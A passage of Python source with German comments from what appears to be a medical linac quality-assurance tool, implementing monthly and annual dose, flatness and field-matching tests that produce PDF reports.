# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, md["tolerance_field"] )
#
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
#print("one2n", result)
return self.pdf.finish(), result
def doJT_end2end( self, filedata ):
"""
.. note:: Test noch nicht erstellt
"""
pass
def doMT_4_1_2(self, fileData):
"""Monatstest: 4.1.2. ()
- Gruppiert nach Doserate, sortiert nach MU
-
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# place for testing parameters
md = dict_merge( DotMap( {
} ), self.metadata )
#md.pprint(pformat='json')
def groupBySeries( df_group ):
"""Datumsweise Auswertung und PDF Ausgabe
Die Daten kommen nach doserate und ME sortiert
"""
#print("doMT_7_2", df_group[ ["energy", "doserate", "ME"] ] )
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
result_doserate = []
def groupByDoserate( df_doserate ):
text = ""
# in den Toleranzangaben der config steht die default query
openFieldQuery = md.current.tolerance.default.check.query
fieldQuery = openFieldQuery.replace("==", "!=")
#print( openFieldQuery, fieldQuery )
# das offene Feld bestimmen
df_base = df_doserate.query( openFieldQuery )
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ), normalize="none" )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
# 100 referenz Dose 1.0
data = [ {
'Kennung': baseField.infos["RadiationId"],
'doserate': baseField.infos["doserate"],
'ME': baseField.infos["ME"],
# 'baseMeanDose': baseMeanDose,
'fieldMeanDose': baseMeanDose,
'diff': (baseMeanDose - 1.0) * 100
}]
# alle anderen filtern
df_fields = df_doserate.query( fieldQuery )
# alle anderen durchgehen
for info in df_fields.itertuples():
# prüft Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
# Berechnung der mittleren Felddosis
fieldMeanDose = checkField.getMeanDose( md["doseArea"] )
# Berechnung
baseFmu = baseMeanDose / baseField.infos['ME'] * checkField.infos['ME']
data.append( {
'Kennung': checkField.infos["RadiationId"],
'doserate': checkField.infos["doserate"],
'ME': checkField.infos["ME"],
'fieldMeanDose': fieldMeanDose,
'diff': (fieldMeanDose - baseFmu) / baseFmu * 100,
} )
# progress
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# aus den daten ein DataFrame machen
evaluation_df = pd.DataFrame( data )
# check tolerance - printout tolerance, evaluation_df - md["tolerance_field"],
acceptance = self.evaluationResult( evaluation_df, md, result_doserate, printResultIcon=False )
# acceptance dieser Gruppe zurückgeben
return acceptance
#
# Gruppiert nach doserate abarbeiten und min zurückgeben
#
acceptance = df_group.groupby( [ "doserate" ] ).apply( groupByDoserate ).min()
#
# Ergebnis in result merken
#
result.append( self.createResult( result_doserate, md, [],
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
# Gesamt check - das schlechteste von result_doserate
self.pdf.resultIcon( acceptance )
#
# Gruppiert nach SeriesNumber abarbeiten
fileData.sort_values( md["series_sort_values"] ).groupby( md["series_groupby"] ).apply( groupBySeries )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_7_2(self, fileData):
"""Jahrestest: 7.2. ()
Abhängigkeit der Kalibrierfaktoren von der Monitorrate
"""
# place for testing parameters
md = dict_merge( DotMap( {
} ), self.metadata )
return self._doField_one2n(fileData, md=md )
def doJT_7_3(self, fileData):
"""Jahrestest: 7.3. ()
Abhängigkeit der Kalibrierfaktoren vom Dosismonitorwert
"""
# place for testing parameters
md = dict_merge( DotMap( {
} ), self.metadata )
return self._doField_one2n(fileData, md=md )
def doJT_7_4(self, fileData):
"""Jahrestest: 7.4. ()
Abhängikeit Kalibrierfaktoren vom Tragarm Rotationswinkel
10x10 Feld unter 0° mit Aufnahmen unter 90, 180, 270 vergleichen
Auswertung in einer ROI von 10mmx10mm
Energie: alle
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values": ["gantry", "collimator"],
"series_groupby": ["day", "SeriesNumber"],
"querys" : {
"base" : "gantry == 0 & collimator == 0",
"fields" : "gantry != 0 | collimator != 0",
},
# "field_count": 3,
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width"},
},
"tolerance_pdf" : {
"attrs": {"margin-top":"-2mm"},
"mode": "text"
},
"doseArea" : { "X1":-5, "X2": 5, "Y1": -5, "Y2": 5 },
"_imgSize" : { "width" : 80, "height" : 80},
"plotImage_field" : 10,
"evaluation_table_pdf" : {
"attrs": { "class":"layout-fill-width", "margin-top": "5mm" },
"fields": [
{'field': 'Kennung', 'label':'Kennung', 'format':'{0}', 'style': [('text-align', 'left')] },
{'field': 'gantry', 'label':'Gantry', 'format':'{0:1.1f}' },
{'field': 'collimator','label':'Kollimator', 'format':'{0:1.1f}' },
{'field': 'baseMeanDose', 'label':'Dosis', 'format':'{0:.5f}' },
{'field': 'fieldMeanDose', 'label':'Prüf Dosis', 'format':'{0:.5f}' },
{'field': 'diff', 'label':'Abweichung [%]', 'format':'{0:.2f}' },
{'field': 'diff_passed', 'label':'Passed' }
],
},
"table_sort_values_by": ["doserate"],
"table_sort_values_ascending": [True],
} ), self.metadata )
def evaluate( df_group ):
"""Evaluate grouped Fields
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
"""
# get base and fields, check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
data = [{
'Kennung': baseField.infos["Kennung"],
'gantry': baseField.infos["gantry"],
'collimator': baseField.infos["collimator"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': np.nan,
'diff': np.nan,
}]
# Bild anzeigen
img = baseField.image.plotImage( original=False
, plotTitle="{Kennung} - G:{gantry:01.1f} K:{collimator:01.1f}"
, field=md["plotImage_field"]
, invert=False # , cmap="jet"
, plotCax=True, plotField=True
)
self.pdf.image(img, md["_imgSize"], attrs={"margin-left":"5mm"} )
# alle anderen durchgehen
for info in df_fields.itertuples():
# prüf Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
fieldDose = checkField.getMeanDose( md["doseArea"] )
#
data.append( {
'Kennung': checkField.infos["Kennung"],
'gantry': checkField.infos["gantry"],
'collimator': checkField.infos["collimator"],
'baseMeanDose': np.nan,
'fieldMeanDose': fieldDose,
'diff': (fieldDose-baseMeanDose) / baseMeanDose * 100,
} )
# Bild anzeigen
img = checkField.image.plotImage( original=False
, plotTitle="{Kennung} - G:{gantry:01.1f} K:{collimator:01.1f}"
, field=md["plotImage_field"]
, invert=False # , cmap="jet"
, plotCax=True, plotField=True
)
self.pdf.image(img, md["_imgSize"], attrs={"margin-left":"5mm"} )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
evaluation_df = pd.DataFrame( data )
# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, 'diff' )
#
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_7_5(self, fileData):
"""Jahrestest: 7.5. ()
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values": ["gantry", "StopAngle"],
"series_groupby": ["day"],
"sub_series_groupby": ["energy"],
"querys" : {
"base" : "GantryRtnDirection == 'NONE'",
"fields" : "GantryRtnDirection != 'NONE'",
"sub_base" : "GantryRtnDirection == 'NONE'",
"sub_fields" : "GantryRtnDirection != 'NONE'",
},
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"doseArea" : { "X1":-5, "X2": 5, "Y1": -5, "Y2": 5 },
"plotImage": {
"original": False,
"plotTitle": "{Kennung} - G:{von_nach}",
"field": 10,
"invert": True,
"cmap": "gray_r", # gray_r twilight jet
"plotCax": True,
"plotField": True
},
"plotImage_pdf": {
"area" : { "width" : 90, "height" : 90 },
#"attrs": "",
},
"evaluation_table_pdf" : {
"attrs": { "class":"layout-fill-width", "margin-top": "5mm" },
"fields": [
{'field': 'Kennung', 'label':'Kennung', 'format':'{0}', 'style': [('text-align', 'left')] },
# {'field': 'ME', 'label':'MU' },
{'field': 'von_nach', 'label':'Gantry' },
{'field': 'baseMeanDose', 'label':'Dosis', 'format':'{0:.5f}' },
{'field': 'fieldMeanDose', 'label':'Prüf Dosis', 'format':'{0:.5f}' },
{'field': 'diff', 'label':'Abweichung [%]', 'format':'{0:.2f}' },
{'field': 'diff_passed', 'label':'Passed' }
],
},
"table_sort_values_by": ["ME"],
"table_sort_values_ascending": [True],
} ), self.metadata )
# alte Auswertung
pre2020 = False
if md.get("AcquisitionYear", 0) < 2020:
md.evaluation_text = ""
md.tolerance_pdf.mode = "text"
pre2020 = True
#md.pprint(pformat='json')
def evaluate( df_group ):
"""Evaluate grouped Fields
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
felder unter 0° sind basis für die winkel felder
Auswertung je doserate
"""
# get base and fields, check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
data = []
# gruppiert nach gantry und kollimator
def sub_evaluate( df ):
# get base and fields, check number of data
# print("doJT_7_5", df[ [ "RadiationId", "gantry", "StopAngle", "collimator", "ME", "doserate", "check_subtag" ] ])
df_base = df.query( md.querys[ "sub_base"] )
df_fields = df.query( md.querys[ "sub_fields"] )
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
# zusätzliche Spalte in fields anlegen
df_fields["von_nach"] = df_group[['gantry','StopAngle']].apply(lambda x : '{:.1f} -> {:.1f}'.format(x[0],x[1]), axis=1)
if pre2020 == True:
data.append({
'Kennung': baseField.infos["Kennung"],
'von_nach': "{:01.1f}".format( baseField.infos["gantry"] ),
'ME': baseField.infos["ME"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': np.nan,
'diff': np.nan,
})
# alle Felder durchgehen
for info in df_fields.itertuples():
# prüf Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
fieldDose = checkField.getMeanDose( md["doseArea"] )
#
if pre2020 == True:
data.append({
'Kennung': checkField.infos["Kennung"],
'von_nach': checkField.infos["von_nach"],
'ME': checkField.infos["ME"],
'baseMeanDose': np.nan,
'fieldMeanDose': fieldDose,
'diff': (fieldDose-baseMeanDose) / baseMeanDose * 100,
})
else:
data.append({
'Kennung': checkField.infos["Kennung"],
'von_nach': checkField.infos["von_nach"],
'ME': checkField.infos["ME"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': fieldDose,
})
# Bild anzeigen
img = checkField.image.plotImage( **md["plotImage"] )
self.pdf.image(img, **md["plotImage_pdf"] )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# sub evaluate
#
df_group.groupby( md["sub_series_groupby"] ).apply( sub_evaluate )
evaluation_df = pd.DataFrame( data )
# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, 'diff' )
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_9_1_2(self, fileData):
"""Jahrestest: 9.1.2. ()
Abhängigkeit der Variation des Dosisquerprofils vom Tragarm-Rotationswinkel
DIN 6847-5:2013; DIN EN 60976: 2011-02
30x30 Feld bei im Bereich 80% der Feldbreite max-min/Wert im Zentralstrahl Bereich von 2mm"
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values": ["gantry"],
"series_groupby": ["day"],
"querys" : {
"fields" : "check_subtag != 'base'",
# "field_count": self.metadata.current.get("fields", 0), # 4
},
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"_clip" : { "width":"50mm", "height":"45mm" },
"_formel": { "margin-top":"15mm", "width":"21mm", "height":"11mm"},
"_table": { "width":105, "height": 45, "left":75, "top":215 },
"_chart" : {"width" : 90, "height" : 70},
"profileSize" : { "width" : 90, "height" : 70 },
"profileTitle" : "Gantry: {gantry}°",
"table_fields" : [
{'field': 'gantry', 'label':'Gantry', 'format':'{0:.1f}' },
{'field': 'crossline', 'label':'crossline [%]', 'format':'{0:.1f}' },
# {'field': 'crossline_soll', 'label':'c-soll [%]', 'format':'{0:.1f}' },
{'field': 'c_soll', 'label':'c-soll [%]', 'format':'{0:.1f}' },
{'field': 'crossline_acceptance', 'label':'c-abw.[%]', 'format':'{0:.3f}' },
{'field': 'inline', 'label':'inline [%]', 'format':'{0:.1f}' },
# {'field': 'inline_soll', 'label':'i-soll [%]', 'format':'{0:.1f}' },
{'field': 'i_soll', 'label':'i-soll [%]', 'format':'{0:.1f}' },
{'field': 'inline_acceptance', 'label':'i-abw.[%]', 'format':'{0:.3f}' },
# {'field': 'i_diff', 'label':'i-abw.[%]', 'format':'{0:.3f}' }
]
} ), self.metadata )
# tolerance Werte bereitstellen
#toleranz = {}
#if "toleranz" in md["testConfig"] and md["energy"] in md["testConfig"]["toleranz"]:
# toleranz = md["testConfig"]["toleranz"][ md["energy"] ]
def evaluate( df_group ):
"""Datumsweise Auswertung
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
data = []
# alle Felder durchgehen
for info in df_group.itertuples():
checkField = qa_field( self.getFullData( info ), normalize="none" )
# Analyse nach DIN (max-min)/center rückgabe in valueiec
profile = checkField.getProfileData()
# crossplane und inplane
c = profile["flatness"]["horizontal"]
i = profile["flatness"]["vertical"]
# key für tolerance
#sollKeyC = "{gantry:1.0f}-cl".format( **checkField.infos )
#sollKeyI = "{gantry:1.0f}-il".format( **checkField.infos )
#sollKey = "{gantry:1.0f}-cl".format( **checkField.infos )
# Bild anzeigen
img = checkField.plotProfile( profile["flatness"], metadata=md )
self.pdf.image(img, md["_chart"], {"padding":"2mm 0 2mm 0"} )
data.append( {
'gantry' : checkField.infos["gantry"],
'crossline': c["value"],
'c_soll' : 5,
#'c_soll' : toleranz.get( sollKeyC, np.nan ),
'inline': i["value"],
'i_soll' : 5,
#'i_soll' : toleranz.get( sollKeyI, np.nan ),
} )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# Grafik und Formel anzeigen
self.pdf.image( "qa/Profile.svg", attrs=md["_clip"])
self.pdf.mathtext( r"$\frac{D_{max} - D_{min}} {D_{CAX}}$", attrs=md["_formel"] )
# dataframe erstellen
df = pd.DataFrame( data )
# berechnete Splaten einfügen
#df['c_diff'] = (df.crossline - df.c_soll ) / df.c_soll * 100
#df['i_diff'] = (df.inline - df.i_soll ) / df.i_soll * 100
#
# Abweichung ausrechnen und Passed setzen
#
check = [
{ "field": 'crossline', 'tolerance':'default' },
{ "field": 'inline', 'tolerance':'default' }
]
acceptance = self.check_acceptance( df, md, check, withSoll=True )
#print( df.columns )
# 'gantry', 'crossline', 'inline', 'crossline_soll',
# 'crossline_acceptance', 'crossline_passed', 'inline_soll',
# 'inline_acceptance', 'inline_passed'
#
# Ergebnis in result merken
#
result.append( self.createResult( df, md, check,
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
#
# Tabelle erzeugen
#
self.pdf.pandas( df,
area=md["_table"],
attrs={"class":"layout-fill-width", "margin-top": "5mm"},
fields=md["table_fields"]
)
# Gesamt check - das schlechteste aus der tabelle
self.pdf.resultIcon( acceptance )
#
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
# fileData.sort_values(["gantry"]).groupby( [ 'day' ] ).apply( groupBySeries )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_10_3(self, fileData ):
"""Jahrestest: 10.3. ( Vierquadrantentest)
Das zusammengesetzte Feld mit dem Full Feld vergleichen
5cm Profil über die Mitte je zwei zusammengesetzter Bereiche
davon min/mean max/mean wobei Mean des gleichen Profils aus dem Full Feld kommt
In den Übergängen ca 70% des vollen Feldes
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values" : ['check_subtag'],
"series_groupby": ["day", "SeriesNumber"],
"querys" : {
"base": "check_subtag.isnull()",
"fields": "check_subtag.notnull()",
"engine": "python"
# "field_count": self.metadata.current.get("fields", 0), # 5
},
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"_chart" : {"width" : 90, "height" : 50},
"_imgSize" : {"width" : 120, "height" : 120},
"_image_attrs" : { "margin-top": "5mm" },
"field" : { "X1":-110, "X2": 110, "Y1": -110, "Y2": 110 },
"evaluation_table_pdf" : {
"fields": [
{'field': 'name', 'label':'von - nach' },
{'field': 'value', 'label':'Wert', 'format':'{0:.3f}' },
{'field': 'value_passed', 'label':'Passed' }
],
"area": {"left" : 125, "top" : 165, "width": 50},
"attrs": {"class":"layout-fill-width"},
},
"evaluation_replaces" : {"value":"Wert"},
"tolerance_pdf": {
"area" : { "left" : 10, "top" : 240, "width": 180},
"mode" : "text"
},
"tolerance_field": "value"
} ), self.metadata )
#print("doJT_10_3-current", md.current )
def evaluate( df_group ):
"""Evaluate grouped Fields.
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
sumfield = []
# alle Felder durchgehen
for (idx, info) in df_fields.iterrows():
checkField = qa_field( self.getFullData(info), normalize="none" )
if len(sumfield) == 0:
sumfield = checkField.image.array
else:
sumfield = np.add( sumfield, checkField.image.array )
# progress
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# das baseField durch das normalisierte Summenfeld erstezen
baseField.image.array = np.divide( sumfield, baseField.image.array + 0.00000001 )
# baseField auswerten
data4q = baseField.find4Qdata()
evaluation_df = pd.DataFrame( data4q['result'] ).T
# alle vier Quadranten durchgeghen
for k, item in data4q["result"].items():
# plot des Quadranten
img = baseField.plot4Qprofile( item, metadata=md )
self.pdf.image(img, md["_chart"] )
#
# Bild mit Beschriftung anzeigen
#
def addToPlot( **args ):
self = args["self"]
ax = args["ax"]
# print( args["field"] )
da = self.getFieldDots( {
"X1": args["field"]["X1"] - 20,
"X2": args["field"]["X2"] + 20,
"Y1": args["field"]["Y1"] - 20,
"Y2": args["field"]["Y2"] + 20
} )
style = dict(size=40, color='green', ha='center', va='center', alpha=.9)
ax.text( da["X1"] , da["Y1"] , 'Q1', **style)
ax.text( da["X1"] , da["Y2"] , 'Q2', **style)
ax.text( da["X2"] , da["Y2"] , 'Q3', **style)
ax.text( da["X2"] , da["Y1"] , 'Q4', **style)
img = baseField.image.plotImage(
original=False
, invert=False
, plotTitle=False
, plotCax=False
, plotField=data4q["field"]
, field=md["field"]
, plotTicks=True
, metadata=md
, arg_function=addToPlot, arg_dict=data4q
)
self.pdf.image(img, md["_imgSize"], attrs=md["_image_attrs"] )
# print("doJT_10_3", md.current, evaluation_df )
# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, md["tolerance_field"] )
#
# Sortiert nach check_subtag
# Gruppiert nach Tag und SeriesNumber abarbeiten
#
( fileData
.sort_values( md["series_sort_values"], na_position='first')
.groupby( md[ "series_groupby" ] )
.apply( evaluate )
)
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doMT_VMAT_0_1( self, fileData ):
"""PicketFence DMLC Dosimetrie eines 40x100 großen Feldes
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
result=[]
# wird für progress verwendet
filesMax=len( fileData )
self.fileCount = 0
# metadata ergänzen und lokal als md bereitstellen
md = dict_merge( DotMap( {
"series_sort_values": ["MLCPlanType", "gantry"],
"series_groupby": ["day", "SeriesNumber"],
"current": {
"field_count": self.metadata.current.get("fields", 0) - 1, # 4
},
"querys" : {
"base" : 'MLCPlanType!="DynMLCPlan"', # "check_subtag == 'base'",
"fields" : 'MLCPlanType=="DynMLCPlan"', # "check_subtag != 'base'",
},
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"doseArea" : { "X1":-0.75, "X2": 0.75, "Y1": -4, "Y2": 4 },
"_imgSize" : {"width" : 36, "height" : 70},
"_imgField": {"border": 10 },
"_chart": { "width" : 180, "height" : 60},
"table_fields" : [
{'field': 'Kennung', 'label':'Kennung', 'format':'{0}', 'style': [('text-align', 'left')] },
{'field': 'gantry', 'label':'Gantry', 'format':'{0:1.1f}' },
# {'field': 'Mof', 'label':'M<sub>OF</sub>', 'format':'{0:.5f}' },
{'field': 'Mcorr', 'label':'M<sub>corr</sub>', 'format':'{0:.4f}' },
{'field': 'Mdev', 'label':'M<sub>dev</sub> [%]', 'format':'{0:.2f}' },
{'field': 'Mdev_passed', 'label':'Passed' },
]
} ), self.metadata )
def groupBySeries( df_group ):
"""Datumsweise Auswertung und PDF Ausgabe.
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
Mof = baseField.image.getRoi( md["doseArea"] ).copy()
data = [{
'Kennung': baseField.infos["Kennung"],
'gantry': baseField.infos["gantry"],
'Mcorr': np.nan,
'Mdev': np.nan,
'Passed' : np.nan
}]
img = baseField.image.plotImage( original=False
, field = md["_imgField"]
, metadata = md
, plotTitle = "{Kennung}"
, invert=False, plotCax=False, plotField=True )
# Bild anzeigen
self.pdf.image( img, md["_imgSize"] )
# alle felder durchgehen
for info in df_fields.itertuples():
field = qa_field( self.getFullData( info ) )
#Mdmlc = field.getMeanDose( md["doseArea"] )
Mdmlc = field.image.getRoi( md["doseArea"] ).copy()
Mcorr = (Mdmlc / Mof).mean()
data.append( {
'Kennung': field.infos["Kennung"],
'gantry': field.infos["gantry"],
'Mcorr': Mcorr,
'Mdev': np.nan,
'Pass' : np.nan
} )
img = field.image.plotImage( original=False
, field = md["_imgField"]
, metadata = md
, plotTitle = "{Kennung}"
, invert=False, plotCax=False, plotField=True )
# Bild anzeigen
self.pdf.image( img, md["_imgSize"] )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
df = pd.DataFrame( data )
McorrMean = df['Mcorr'].mean( )
df[ 'Mdev' ] = (df[ 'Mcorr' ] - McorrMean ) / McorrMean * 100
#
# Abweichung ausrechnen und Passed setzen
#
check = [
{ "field": 'Mdev', 'tolerance':'default' }
]
acceptance = self.check_acceptance( df, md, check )
#
# Ergebnis in result merken
#
result.append( self.createResult( df, md, check,
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
# Formel
self.pdf.mathtext( r"Berechnung des Flatness-korrigierten Bildes: $M_{corr,i}(x,y) = \frac{M_{DMLC,i}(x,y)}{M_{OF}(x,y)}$", attrs={ "margin-top": "5mm" } )
self.pdf.mathtext( r"Dosimetrische Abweichung aus den ROI-Mittelwerten: $M_{dev,i} = \frac{\overline{M_{corr,i}}-\overline{M_{corr}}}{\overline{M_{corr}}}$", attrs={ "margin-top": "5mm" } )
#
# Tabelle erzeugen
#
self.pdf.pandas( df,
attrs={"class":"layout-fill-width", "margin-top": "5mm"},
fields=md["table_fields"]
)
text_values = {
"f_warning": md.current.tolerance.default.warning.get("f",""),
"f_error": md.current.tolerance.default.error.get("f","")
}
text = """<br>
Warnung bei: <b style="position:absolute;left:45mm;">{f_warning}</b><br>
Fehler bei: <b style="position:absolute;left:45mm;">{f_error}</b>
""".format( **text_values ).replace("{value}", "M<sub>dev</sub>")
self.pdf.text( text )
# Gesamt check
self.pdf.resultIcon( acceptance )
#
# Gruppiert nach SeriesNumber abarbeiten
#
fileData.sort_values(["MLCPlanType", "gantry"], na_position='first').groupby( [ 'day', 'SeriesNumber' ] ).apply( groupBySeries )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doMT_8_02_5(self, fileData ):
"""
Die jeweilig gleichen Gantry und Kolliwinkel übereinanderlegen und mit dem offenem Feld vergleichen
# Anzahl der Felder gesamt - MLCPlanType nicht None
count_0 = len(df) - df["MLCPlanType"].count()
count_other = len( df ) - count_0
if count_0 != 1 and count_other != 4:
print( "Falsche Anzahl der Felder offen:{} other:{}".format( count_0, count_other) )
return
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width"},
},
"_imgSize" : {"width" : 45, "height" : 45},
"fieldArea" : { "X1":-80, "X2":80, "Y1": -80, "Y2":80, "xStep":20, "yStep":20 },
"doseArea" : { "X1": -60, "X2": 60, "Y1": -60, "Y2": 60 },
"table_fields": [
{'field': 'gantry', 'label':'Gantry', 'format':'{0:1.1f}' },
{'field': 'collimator', 'label':'Kollimator', 'format':'{0:1.1f}' },
{'field': 'basedose', 'label':'Ref. Dosis', 'format':'{0:1.4f}' },
{'field': 'fielddose', 'label':'Feld Dosis', 'format':'{0:1.4f}' },
{'field': 'diff', 'label':'Diff [%]', 'format':'{0:1.2f}' },
{'field': 'diff_passed', 'label':'Passed' }
]
} ), self.metadata )
# für jeden datensatz
def groupBySeries( df_group ):
"""Datumsweise Auswertung und PDF Ausgabe
"""
# das Datum vom ersten Datensatz verwenden
checkDate = df_group['AcquisitionDateTime'].iloc[0].strftime("%d.%m.%Y")
self.pdf.setContentName( checkDate )
#
# Anleitung
#
self.pdf.textFile( **md.manual )
#print( df.query("CollMode == 'Symmetry'") )
# es muss ein symetrisches basis Feld geben
df_sym = df_group.query("CollMode == 'Symmetry'")
if len(df_sym) != 1:
result.append( self.pdf_error_result(
md, date=checkDate, group_len=len( result ),
msg='<b>Datenfehler</b>: keine Felder gefunden oder das offene Feld fehlt.'
) )
return
# base Field bereitstellen
baseField = qa_field( self.getFullData( df_sym.loc[df_sym.index[0]] ) )
# progress
self.fileCount += 1
# dosis ermitteln
baseDose = baseField.getMeanDose( md["doseArea"] )
data = []
def joinImages( jdf ):
# für beide Bilder
if len(jdf) != 2:
return
# die felder bereitstellen
field = []
for index, row in jdf.iterrows():
field.append( qa_field( self.getFullData( row ) ) )
# die image daten des ersten feldes mit der Summe beider überschreiben
field[0].image.array = np.add( field[0].image.array, field[1].image.array )
# das Summenfeld ausgeben
img = field[0].image.plotImage( original=False
, metadata=md
, field = md["fieldArea"]
, plotTitle="G:{gantry:01.1f} K:{collimator:01.1f}"
, cmap='twilight'
#, cmap='gray_r'
, invert=False, plotCax=True, plotField=False )
self.pdf.image( img, md["_imgSize"], attrs={"margin-top": "5mm"} )
# die sumendosis ermitteln
fieldDose = field[0].getMeanDose( md["doseArea"] )
# Ergebnisse merken
data.append( {
